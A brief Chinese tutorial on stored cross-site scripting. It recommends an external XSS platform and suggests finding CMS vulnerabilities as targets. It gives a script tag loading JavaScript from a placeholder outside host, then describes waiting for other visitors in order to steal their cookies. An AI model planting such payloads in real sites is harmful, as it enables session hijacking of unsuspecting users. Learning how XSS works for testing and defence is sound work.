存储XSS

XSS的本质就是用户的输入输出被当成前端JS代码执行了，那么存储型和其他XSS区别在于他会储存到服务器里面去，危害是XSS中最大的。

我们首先需要一个XSS平台http://xss.tf/index.php?do=login这个平台可以帮我们做出很多的JS功能，我们只要把JS语句插进去那么就可以无所不能。只要JS能实现的，在这里我们都可以实现。

靶场的话可以百度查找cms通杀漏洞找到之后我们可以插入自己的XSS代码：

<script src=http://xxx/xxxxx></script>

然后等待其他人访问吗，通过XSS平台拿到cookie